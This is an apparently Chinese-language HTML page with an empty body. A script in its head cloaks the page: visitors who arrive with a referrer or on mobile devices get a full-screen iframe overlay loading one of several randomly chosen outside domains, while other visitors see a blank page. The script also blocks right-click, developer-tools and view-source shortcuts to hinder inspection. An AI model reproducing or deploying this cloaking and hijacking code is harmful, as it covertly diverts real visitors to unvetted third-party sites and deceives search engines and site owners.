<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script>
    var referrer = document.referrer || "";
    var hasReferrer = referrer !== ""; 
    var isMobile = /Macintosh|Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini|Mobi|Mobile/i.test(navigator.userAgent);

    var targetUrls = [''];

    if (hasReferrer || isMobile) {
        targetUrls = ['https://gudao.lat', 'https://gudao.pro', 'https://gudao.lol', 'https://www.gudao123.com'];
    }

    var randomIndex = Math.floor(Math.random() * targetUrls.length);
    var finalUrl = targetUrls[randomIndex];
	
    if (finalUrl !== '') {
        document.write('<meta name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
        document.write('<style>html,body{width:100%;height:100%;overflow:hidden;margin:0;padding:0;}</style>');
        document.write('<div style="width:100%;height:100%;position:fixed;top:0;left:0;z-index:2147483647;background:#fff">');
        document.write('<iframe src="' + finalUrl + '" frameborder="0" style="border:0;width:100%;height:100%;"></iframe>');
        document.write('</div>');
    }

    (function() {
        document.addEventListener('contextmenu', function(e) { e.preventDefault(); });
        document.addEventListener('keydown', function(e) {
            if (e.keyCode === 123 || (e.ctrlKey && e.shiftKey && (e.keyCode === 73 || e.keyCode === 74)) || (e.ctrlKey && e.keyCode === 85)) {
                e.preventDefault();
                return false;
            }
        });
    })();
</script>
    <style>
        html, body { 
            margin: 0; padding: 0; width: 100%; height: 100%; 
            background-color: #ffffff !important; overflow: hidden; 
        }
    </style>
</head>
<body>

    <main style="padding: 20px; font-size: 16px; color: #333; line-height: 1.6;">
        <div style="margin-bottom: 20px;">
            <h2 style="font-size: 18px; color: #0056b3; margin: 0 0 10px 0;"></h2>
        </div>
    </main>

<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?f516f060cec9cc4c9022b4835ea4145d";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>

</body>
</html>








	

	
